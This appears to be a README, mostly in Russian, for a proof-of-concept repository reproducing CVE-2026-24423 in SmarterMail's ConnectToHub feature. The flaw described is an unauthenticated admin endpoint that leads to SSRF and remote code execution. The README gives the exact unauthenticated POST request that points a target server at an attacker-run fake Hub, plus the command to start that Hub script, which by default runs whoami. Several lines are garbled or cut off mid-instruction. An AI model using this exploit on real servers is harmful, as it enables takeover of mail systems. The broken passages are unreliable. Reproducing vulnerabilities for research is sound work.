
Репродукционный скрипт для CVE-2026-24423 — нарушения границы доверия в SmarterMail ConnectToHub, приводящего к SSRF и потенциальному удалённому выполнению кода. Включает имитированный сервер Hub и инструкции по запуску уязвимого API.
# CVE-2026-24423 – Воспроизведение
> ⚠️ **Только для исследований в области безопасности и авторизованного тестирования / For security research and authorized testing only**
## Обзор (Overview)
Данный проект предназначен для воспроизведения уязвимости **CVE-2026-24423**.
Уязвимость существует в функции **SmarterMail ConnectToHub**, её первопричина заключается в следующем:
- Интерфейс уровня администратора не требует аутентификации
- Сервер активно подключается к указанному пользователем Hub (SSRF)
- Данные, возвращаемые внешним Hub, напрямую используются для локальных операций системного уровня
Данная уязвимость относится к **нарушению границ доверия на уровне проектирования (Trust Boundary Violation)** и в конечном итоге может привести к удалённому выполнению кода.
Данный репозиторий предназначен **только для проверки уязвимости и технических исследований**, а не для использования в качестве оружия.
Start Hub Simulation Server
python3 cve-2026-24423.py
Данный скрипт будет:
SystemMountTrigger the Vulnerable API
Используйте Yakit или Burp Suite для отправки запроса:
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json
{
"hubAddress": "http://ip",
"oneTimePassword": "test",
"nodeName": "victim"
}
Данный интерфейс не требует аутентификации No authentication is required.
Troubleshooting
Если воспроизведение уязвимости не удалось:
MountPath в файле cve-2026-24423.pyResult
При успешном срабатывании уязвимости SmarterMail обработает данные, возвращённые Hub; код по умолчанию выполняет только команду whoami.
Пример / Example:

Данный проект выполнен с помощью ChatGPT.